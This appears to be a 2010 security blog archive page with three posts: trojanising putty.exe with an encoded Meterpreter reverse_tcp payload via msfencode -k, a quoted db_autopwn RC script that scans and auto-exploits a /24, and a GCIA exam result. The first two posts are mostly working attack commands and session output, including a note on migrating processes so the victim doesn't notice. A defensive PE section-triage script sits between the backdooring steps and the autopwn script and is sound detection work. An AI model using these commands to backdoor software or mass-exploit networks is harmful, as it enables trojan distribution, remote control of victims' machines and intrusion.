Archive for March, 2010

msfencoded payloads into executables (-k)

For a while now it has been possible to add msfencoded payloads into executables. However, the resulting files would not work as expected: you could trick a user into running a file that would in turn give you a Meterpreter session, but the user would soon notice that something was amiss with the exe. Not any more.

http://www.metasploit.com/redmine/projects/framework/repository/revisions/8896

./msfencode -h

Usage: ./msfencode
OPTIONS:
-a The architecture to encode as
-b The list of characters to avoid: '\x00\xff'
-c The number of times to encode the data
-e The encoder to use
-h Help banner
-i Encode the contents of the supplied file path
-k Keep template working; run payload in new thread (use with -x)
-l List available encoders
-m Specifies an additional module search path
-n Dump encoder information
-o The output file
-p The platform to encode for
-s The maximum size of the encoded data
-t The format to display the encoded buffer with (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war)
-x Specify an alternate win32 executable template

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.199.129 LPORT=31337 R | ./msfencode -x putty.exe -t exe -k -o putty_backdoored.exe -e x86/shikata_ga_nai -c 10

[*] x86/shikata_ga_nai succeeded with size 315 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 342 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 369 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 396 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 423 (iteration=5)
[*] x86/shikata_ga_nai succeeded with size 450 (iteration=6)
[*] x86/shikata_ga_nai succeeded with size 477 (iteration=7)
[*] x86/shikata_ga_nai succeeded with size 504 (iteration=8)
[*] x86/shikata_ga_nai succeeded with size 531 (iteration=9)
[*] x86/shikata_ga_nai succeeded with size 558 (iteration=10)

file putty_backdoored.exe
putty_backdoored.exe: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.199.129
LHOST => 192.168.199.129
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.199.129:31337
[*] Starting the payload handler...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.199.129:31337 -> 192.168.199.130:50766)

You'll still need to migrate to another process, or your Meterpreter session will terminate when the backdoored process is killed.
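From the defender's side, an executable produced this way still has to carry its payload somewhere in the PE image, and the place it lands is often visible in the section table. The following script is an added example, not code from the post or from Metasploit: it parses the PE section headers with nothing but the standard library and applies two triage heuristics (a section that is both writable and executable; an entry point that lands in the last section). Both heuristics are my assumptions about what looks unusual, not a statement of exactly how msfencode lays out its output, and the sample image it inspects is constructed in the script itself, with a made-up section name ".inject".

```python
"""Section-table triage for a Windows PE that may carry a grafted payload.
Added example (not Metasploit code); the heuristics are assumptions."""
import struct
import sys

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_HDR = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER, 40 bytes


def parse_pe(data):
    """Return (AddressOfEntryPoint, [section dicts]) from a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                     # IMAGE_FILE_HEADER
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    size_opt = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20                         # IMAGE_OPTIONAL_HEADER
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    sections, off = [], opt + size_opt
    for _ in range(num_sections):
        (name, vsize, va, rawsize, rawptr,
         _reloc, _lines, _nreloc, _nlines, chars) = struct.unpack_from(SECTION_HDR, data, off)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_size": vsize, "virtual_address": va,
                         "raw_size": rawsize, "raw_ptr": rawptr,
                         "characteristics": chars})
        off += 40
    return entry_rva, sections


def section_for_rva(sections, rva):
    """Find the section whose virtual range contains the given RVA."""
    for s in sections:
        size = max(s["virtual_size"], s["raw_size"])
        if s["virtual_address"] <= rva < s["virtual_address"] + size:
            return s
    return None


def triage(data):
    """Return a list of human-readable findings (empty list = nothing odd)."""
    entry, sections = parse_pe(data)
    findings = []
    for s in sections:
        c = s["characteristics"]
        if c & IMAGE_SCN_MEM_EXECUTE and c & IMAGE_SCN_MEM_WRITE:
            findings.append(f"section {s['name']!r} is writable and executable")
    ep = section_for_rva(sections, entry)
    if ep is None:
        findings.append(f"entry point 0x{entry:x} lies outside every section")
    elif len(sections) > 1 and ep is sections[-1]:
        findings.append(f"entry point 0x{entry:x} is in the last section {ep['name']!r}")
    return findings


def _section_header(name, va, size, chars):
    return struct.pack(SECTION_HDR, name, size, va, size, 0, 0, 0, 0, 0, chars)


def build_sample_pe(with_injected_section):
    """Constructed test data: headers of a minimal PE32 image, no section bodies."""
    sections = [
        _section_header(b".text", 0x1000, 0x1000, 0x60000020),  # CODE|EXECUTE|READ
        _section_header(b".data", 0x2000, 0x1000, 0xC0000040),  # DATA|READ|WRITE
    ]
    entry = 0x1010
    if with_injected_section:  # hypothetical grafted section, name made up
        sections.append(_section_header(b".inject", 0x3000, 0x1000, 0xE0000020))
        entry = 0x3000
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)      # PE32 magic
    struct.pack_into("<I", opt, 16, entry)     # AddressOfEntryPoint
    return dos + b"PE\0\0" + coff + bytes(opt) + b"".join(sections)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            blob = fh.read()
    else:
        blob = build_sample_pe(with_injected_section=True)
    for line in triage(blob) or ["no findings"]:
        print(line)
```

Run it with a path to inspect a real file, or with no arguments to see the two findings the constructed sample triggers. Neither heuristic is proof of tampering (packers and some linkers also produce writable code sections), so treat a hit as a reason to compare the file's hash against the vendor's published one rather than as a verdict.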

msfconsole and db_autopwn

I just saw this on seclists.org.

HD Moore posted this to kick off db_autopwn via an msfconsole RC script:

$ vim ownitall.rc
db_create /tmp/mynet.db
db_nmap -sS -F -n 192.168.0.0/24 -T5
setg AutoRunScript scraper
db_autopwn -t -e -p -r

$ msfconsole -r ownitall.rc

GCIA Results

So I passed with an 88. Kind of disappointed I didn't do better, ridiculous mistakes, oh well. I had two questions that were flat out wrong and I contacted the GIAC. Enough about that, now I just need to come up with a topic for my Gold paper. Any suggestions?
